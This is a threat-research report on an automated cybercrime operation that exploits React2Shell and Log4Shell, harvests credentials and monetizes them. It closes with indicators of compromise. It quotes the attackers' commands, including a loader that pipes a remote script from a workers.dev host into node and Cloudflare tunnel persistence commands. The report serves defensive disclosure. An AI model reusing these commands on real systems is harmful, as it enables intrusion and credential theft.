Threat Research Team has identified a highly automated Chinese cybercrime infrastructure that blends large-scale exploitation with structured orchestration and monetization. This operation is coordinated through a centralized backend, codenamed “paperclip”, and an agent-based workflow system known as OpenClaw. Together, these components enable operators to manage campaigns through structured missions, transforming opportunistic exploitation into a disciplined cybercrime enterprise.
Targeting Strategy
The infrastructure leverages FOFA and 360Quake, two powerful cyberspace mapping engines commonly used by researchers, but here weaponized for reconnaissance. FOFA is employed to identify high-value organizations such as Web3 platforms, fintech services, and security vendors. Meanwhile, 360Quake focuses on technical fingerprinting of vulnerable services.
A notable tactic is the mass generation of FOFA accounts (e.g., fofa<random>@deltajohnsons[.]com), which bypasses API limits and sustains continuous scanning. This automation ensures uninterrupted reconnaissance, enabling attackers to maintain visibility across thousands of internet-facing assets.
Exploitation and Execution
The attackers deploy custom Python scripts (2.py, 3.py, 4.py, 11.py) to automate exploitation. These scripts execute commands such as environment variable dumps, bypass WAF protections, and support parallel execution. Unlike opportunistic vulnerability scanning, the focus here is reliable remote code execution at scale.
Key exploits include:
- React2Shell (CVE-2025-55182, CVE-2025-66478)
- Log4Shell (CVE-2021-44228)
This combination allows attackers to compromise diverse targets, extract sensitive data, and validate stolen credentials in real time.
Credential Harvesting
Post-exploitation, the attackers prioritize runtime secrets over raw dumps. Environment variable extraction yields AI API keys, Stripe keys, database credentials, and tokens. These are parsed and stored centrally, ensuring immediate usability for monetization. This structured approach highlights a focus on direct financial gain rather than indiscriminate data theft.
Persistence and Access
Persistence is achieved through multiple redundant mechanisms:
- Cloudflare tunnels (
cf-client –name sshd wss://*.trycloudflare.com/ws) - P2P clients (
p2p-client client –name mayun) - Backdoors (
d2,pl)
The preference for lightweight backdoors over traditional webshells demonstrates an emphasis on stealth and scalability.
Advanced Fileless Loader
The attackers employ an NKN-based C2 deployment with fileless execution chains:
python3 2.py -w -c “curl https://soft-silence-*.workers.dev/ | node”
python3 2.py -w -c “echo <base64_payload> | node”This technique minimizes forensic artifacts, complicating detection and response efforts.
Orchestration Layer
The OpenClaw workflow interface provides human-in-the-loop orchestration. Observed UI stages include: Plan → Review → Dispatch → Recon → Scan → Validate → Report
This structured pipeline confirms that operators maintain oversight while leveraging automation for scale.
Monetization
Stolen data is enriched and monetized through blockchain intelligence APIs and Stripe validation. Cryptocurrency addresses are tracked across multiple chains using OKLink, OKX, and Tatum APIs, while stolen Stripe keys are tested for available balances. This enables immediate prioritization of high-value targets, ensuring efficient monetization.
Scale and Telemetry
Backend telemetry reveals the maturity of the operation:
- ~45,000 exploitation attempts logged
- 346 vulnerable hosts identified via React2Shell
- 3981 hosts with
d2backdoor - 1393 hosts with
plbackdoor - 900 webshell implants
- 21,999 crypto addresses tracked
Execution telemetry is centrally logged in tables such as payload_exec_log, direct_payload_log, and clip_exec_log, providing operators with granular visibility into campaign success.
Conclusion
This infrastructure represents a paradigm shift in cybercrime operations. By integrating exploitation, credential harvesting, persistence, and monetization into a unified workflow, attackers achieve industrial-scale efficiency. Defensive strategies must evolve to detect not only exploitation attempts but also post-exploitation behaviors and monetization pipelines. The discovery of this infrastructure underscores a fundamental evolution in cybercrime: the transition from opportunistic exploitation to industrialized operations. What makes this case particularly alarming is the fusion of automation with human oversight. Unlike traditional botnets or opportunistic campaigns, the “paperclip” backend and OpenClaw workflow system demonstrate a corporate-style orchestration model, where exploitation, credential harvesting, and monetization are treated as structured business processes.
The reliance on FOFA and 360Quake for reconnaissance highlights how attackers weaponize legitimate research tools, blurring the line between security analysis and malicious activity. The preference for lightweight backdoors (d2 and pl) over webshells reflects a strategic emphasis on stealth, scalability, and persistence. Moreover, the monetization pipeline—integrating blockchain intelligence APIs and Stripe validation—shows that attackers are not merely stealing data but actively operationalizing financial fraud at scale. In our view, this case represents a wake-up call for defenders. Security teams must expand detection beyond initial exploitation to include post-exploitation telemetry, credential misuse, and monetization behaviors. The industrialization of cybercrime means that every compromised API key, Stripe credential, or crypto wallet is not just a data point—it is a direct financial asset in a global underground economy.
Indicators of Compromise (IOCs)
| Infrastructure IP Address | 124[.]220[.]164[.]14 |
| Domains | 1. kf[.}unpkg[.]top 2. anson-aeromarine-ocularly[.]ngrok-free[.]dev 3. soft-silence-d978[.]13544681192[.]workers[.]dev |
| URLs | 1. https[://]d6[.]tfdl[.]net/public/2026-04-07/a946d7de-2525-4189-bf4f-c3f4eec7a8ff/client.mjs 2. https[://]d6[.]tfdl[.]net/public/2026-04-07/5777281b-9243-4169-8faa-af60d7904c01/cf-client 3. https[://]d6[.]tfdl[.]net/public/2026-04-07/3d0d43d6-3b6d-44e6-bbff-2404f83a66b6/hybrid 4. http[://]mainnet-seed-0004[.]nkn[.]org:30003 5. http[://]mainnet-seed-0012[.]nkn[.]org:30003 6. http[://]mainnet-seed-0020[.]nkn[.]org:30003 |
| Emails | 1. 13544681192[@]163[.]com 2. d1rpt1xf[@]wegame[.]com 3. fofa*[@]deltajohnsons[.]com |
| Exploits | 2.py, 3.py, 4.py, 11.py JNDIExploit-1.2-SNAPSHOT.jar |
